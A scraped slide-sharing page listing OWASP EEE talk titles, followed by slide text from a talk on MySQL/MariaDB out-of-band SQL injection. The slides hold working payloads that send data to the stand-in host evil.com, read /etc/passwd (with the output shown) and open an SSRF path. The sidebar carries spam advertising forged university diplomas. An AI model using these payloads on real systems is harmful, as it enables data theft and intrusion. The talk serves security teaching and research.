[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification system[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification system
OWASP EEE
 
[Russia] Bugs -> max, time &lt;= T
[Russia] Bugs -> max, time &lt;= T[Russia] Bugs -> max, time &lt;= T
[Russia] Bugs -> max, time &lt;= T
OWASP EEE
 
[Russia] Building better product security
[Russia] Building better product security[Russia] Building better product security
[Russia] Building better product security
OWASP EEE
 
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
OWASP EEE
 
[Hungary] I play Jack of Information Disclosure
[Hungary] I play Jack of Information Disclosure[Hungary] I play Jack of Information Disclosure
[Hungary] I play Jack of Information Disclosure
OWASP EEE
 
[Hungary] Survival is not mandatory. The air force one has departured are you...
[Hungary] Survival is not mandatory. The air force one has departured are you...[Hungary] Survival is not mandatory. The air force one has departured are you...
[Hungary] Survival is not mandatory. The air force one has departured are you...
OWASP EEE
 
[Hungary] Secure Software? Start appreciating your developers!
[Hungary] Secure Software? Start appreciating your developers![Hungary] Secure Software? Start appreciating your developers!
[Hungary] Secure Software? Start appreciating your developers!
OWASP EEE
 
[Bucharest] Your intents are dirty, droid!
[Bucharest] Your intents are dirty, droid![Bucharest] Your intents are dirty, droid!
[Bucharest] Your intents are dirty, droid!
OWASP EEE
 
[Bucharest] #DontTrustTheDarkSide
[Bucharest] #DontTrustTheDarkSide[Bucharest] #DontTrustTheDarkSide
[Bucharest] #DontTrustTheDarkSide
OWASP EEE
 
[Bucharest] From SCADA to IoT Cyber Security
[Bucharest] From SCADA to IoT Cyber Security[Bucharest] From SCADA to IoT Cyber Security
[Bucharest] From SCADA to IoT Cyber Security
OWASP EEE
 
[Bucharest] Reversing the Apple Sandbox
[Bucharest] Reversing the Apple Sandbox[Bucharest] Reversing the Apple Sandbox
[Bucharest] Reversing the Apple Sandbox
OWASP EEE
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence
OWASP EEE
 

More from OWASP EEE (17)

[Austria] ZigBee exploited
[Austria] ZigBee exploited[Austria] ZigBee exploited
[Austria] ZigBee exploited
 
[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking Trojan[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking Trojan
 
[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec tools[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec tools
 
[Cluj] Turn SSL ON
[Cluj] Turn SSL ON[Cluj] Turn SSL ON
[Cluj] Turn SSL ON
 
[Cluj] Information Security Through Gamification
[Cluj] Information Security Through Gamification[Cluj] Information Security Through Gamification
[Cluj] Information Security Through Gamification
 
[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification system[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification system
 
[Russia] Bugs -> max, time &lt;= T
[Russia] Bugs -> max, time &lt;= T[Russia] Bugs -> max, time &lt;= T
[Russia] Bugs -> max, time &lt;= T
 
[Russia] Building better product security
[Russia] Building better product security[Russia] Building better product security
[Russia] Building better product security
 
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
 
[Hungary] I play Jack of Information Disclosure
[Hungary] I play Jack of Information Disclosure[Hungary] I play Jack of Information Disclosure
[Hungary] I play Jack of Information Disclosure
 
[Hungary] Survival is not mandatory. The air force one has departured are you...
[Hungary] Survival is not mandatory. The air force one has departured are you...[Hungary] Survival is not mandatory. The air force one has departured are you...
[Hungary] Survival is not mandatory. The air force one has departured are you...
 
[Hungary] Secure Software? Start appreciating your developers!
[Hungary] Secure Software? Start appreciating your developers![Hungary] Secure Software? Start appreciating your developers!
[Hungary] Secure Software? Start appreciating your developers!
 
[Bucharest] Your intents are dirty, droid!
[Bucharest] Your intents are dirty, droid![Bucharest] Your intents are dirty, droid!
[Bucharest] Your intents are dirty, droid!
 
[Bucharest] #DontTrustTheDarkSide
[Bucharest] #DontTrustTheDarkSide[Bucharest] #DontTrustTheDarkSide
[Bucharest] #DontTrustTheDarkSide
 
[Bucharest] From SCADA to IoT Cyber Security
[Bucharest] From SCADA to IoT Cyber Security[Bucharest] From SCADA to IoT Cyber Security
[Bucharest] From SCADA to IoT Cyber Security
 
[Bucharest] Reversing the Apple Sandbox
[Bucharest] Reversing the Apple Sandbox[Bucharest] Reversing the Apple Sandbox
[Bucharest] Reversing the Apple Sandbox
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence
 

Recently uploaded

快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
3a0sd7z3
 
Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?
Paul Walk
 
Discover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to IndiaDiscover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to India
davidjhones387
 
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
bseovas
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
ysasp1
 
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
3a0sd7z3
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
wolfsoftcompanyco
 
一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理
k4ncd0z
 
HijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process HollowingHijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process Hollowing
Donato Onofri
 
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
xjq03c34
 
Design Thinking NETFLIX using all techniques.pptx
Design Thinking NETFLIX using all techniques.pptxDesign Thinking NETFLIX using all techniques.pptx
Design Thinking NETFLIX using all techniques.pptx
saathvikreddy2003
 
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
uehowe
 
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
rtunex8r
 
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
uehowe
 
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
fovkoyb
 
Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!
Toptal Tech
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
hackersuli
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
uehowe
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
Laura Szabó
 

Recently uploaded (19)

快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
 
Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?
 
Discover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to IndiaDiscover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to India
 
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
 
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
 
一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理
 
HijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process HollowingHijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process Hollowing
 
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
 
Design Thinking NETFLIX using all techniques.pptx
Design Thinking NETFLIX using all techniques.pptxDesign Thinking NETFLIX using all techniques.pptx
Design Thinking NETFLIX using all techniques.pptx
 
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
 
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
 
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
 
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
 
Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
 

[Russia] MySQL OOB injections

  • 2. BIO @d0znpp ● Researcher ● Bug hunter ● Wallarm CEO
  • 3. MySQL today ● MySQL (http://www.oracle.com/us/products/mysql/overview/index.html) ○ Enterprise Edition (http://www.oracle.com/us/products/mysql/mysqlenterprise/overview/index.html) ○ Standard Edition (http://www.oracle.com/us/products/mysql/mysqlstandard/overview/index.html) ○ Classic Edition (http://www.oracle.com/us/products/mysql/mysqlclassic/overview/index.html) ○ Community Edition (http://www.oracle.com/us/products/mysql/mysqlcommunityserver/overview/index.html) ○ Cluster CGE (http://www.oracle.com/us/products/mysql/mysqlcluster/overview/index.html) ○ Embedded (OEM/ISV) (http://www.oracle.com/us/products/mysql/mysqlembedded/overview/index.html) ● MariaDB (https://mariadb.org/) ● Percona (https://www.percona.com/) *out of scope
  • 4. SQL injections summary ● Classic (data from query puts into response) a.k.a. “UNION SELECT” ● Blind (no SQL queries data puts into response) Blind SQli exploitation techniques: ● Using foreign objects (id='and(1<<(id-1)&length(load_file('/etc/passwd')))--) ● Error-based (when SQL errors puts into responses) ● Boolean search (when status code or smth. else indicates query status) ● Time-based (boolean search where query execution time indicates status) ● Out-of-band (OOB load_file(concat(‘’,version(),’.evil.comoob’)))
  • 5. Why OOB? ● Faster ● Only one way to exploit asynchronous services What is asynchronous? ● I want to login. This is my credentials ● Ok. Wait... ● Is it ready? ● Is it ready?
  • 6.
  • 7. MySQL injections overview ● Cheat sheets ○ http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet ○ https://rdot.org/forum/showthread.php?t=124 ● Latest error-based tricks: ○ EXP (https://www.exploit-db.com/docs/37953.pdf) ○ Non-geometric (https://rdot.org/forum/showpost.php?p=37133&postcount=1) ○ BIGINT UNSIGNED (https://rdot.org/forum/showthread.php?t=3167) ○ JSON_* (https://twitter.com/dsrbr/status/649963694533775360)
  • 8. Out-of-band for MySQL and Windows UNC filenames on Windows systems (http://arxiv.org/pdf/1303.3047.pdf by Miroslav Štampar) ● LOAD_FILE(concat(‘’,version(),’.evil.comoob’)) function ● SELECT … INTO (OUTFILE | DUMPFILE) ‘...’ And also other file access variants: ● LOAD DATA (LOCAL) INFILE ‘...’
  • 9.
  • 10. What you must know about “... LOCAL ...” ● LOAD DATA LOCAL INFILE executes on MySQL client. Not on server ● Client could define callback function for this (http://php.net/manual/ru/mysqli. set-local-infile-handler.php) ● By default this callback implemented in MySQL client driver ● This one supports all available wrappers in your platform ● LOAD DATA LOCAL INFILE ‘(http|php|expect|...)://...’ <- YES! Why not :) ● SSRF there
  • 11.
  • 12. FEDERATED storage engine OOB ● Different storage engines: MEMORY, CSV, ... ● FEDERATED storage engine (https://dev.mysql.com/doc/refman/5. 7/en/federated-storage-engine.html and https://mariadb. com/kb/en/mariadb/about-federatedx/) ● CREATE TABLE … ENGINE=FEDERATED CONNECTION=’mysql://…’
  • 13. CONNECT storage engine OOB (MariaDB) ● Different storage engines: MEMORY, CSV, ... ● CONNECT storage engine (https://mariadb.com/kb/en/mariadb/connect-table- types-mysql-table-type-accessing-mysqlmariadb-tables/ https://mariadb. com/kb/en/mariadb/connect-security/) ● OOB through MYSQL and ODBC table_type ● CREATE TABLE t(id int) engine=CONNECT table_type=MYSQL connection='mysql://root@evil.com/database/table; The use of the CONNECT engine requires the FILE privilege for "outward" tables. This should not be an important restriction. The use of CONNECT "outward" tables on a remote server seems of limited interest without knowing the files existing on it and must be protected anyway. On the other hand, using it on the local client machine is not an issue because it is always possible to create locally a user with the FILE privilege.
  • 14. MariaDB CONNECT ENGINE file access All of these table types supports file_name argument: ● DOS ● DBF ● BIN ● CSV ● FMT ● XML (no XXE there, sorry :) ● JSON ● INI
  • 15. MariaDB CONNECT ENGINE file access MariaDB [test]> create table root(a varchar(1024)) engine=connect table_type=CSV file_name='/etc/passwd'; Query OK, 0 rows affected (0.00 sec) MariaDB [test]> select * from root; +-----------------------------------------------------------------------+ | a | +-----------------------------------------------------------------------+ | root:x:0:0:root:/root:/bin/bash | | bin:x:1:1:bin:/bin:/sbin/nologin | | daemon:x:2:2:daemon:/sbin:/sbin/nologin | | adm:x:3:4:adm:/var/adm:/sbin/nologin | | lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | | sync:x:5:0:sync:/sbin:/bin/sync | +-----------------------------------------------------------------------+ 7 rows in set (0.01 sec)
  • 16. MariaDB CONNECT ENGINE piece of cheat https://mariadb.com/kb/en/mariadb/connect-table-types-special-virtual-tables/ … table_type=DIR file_name=’*.frm’ options=’subdir=1’ Also only for Windows: ● MAC (network adapter details) ● WMI (really)
  • 17.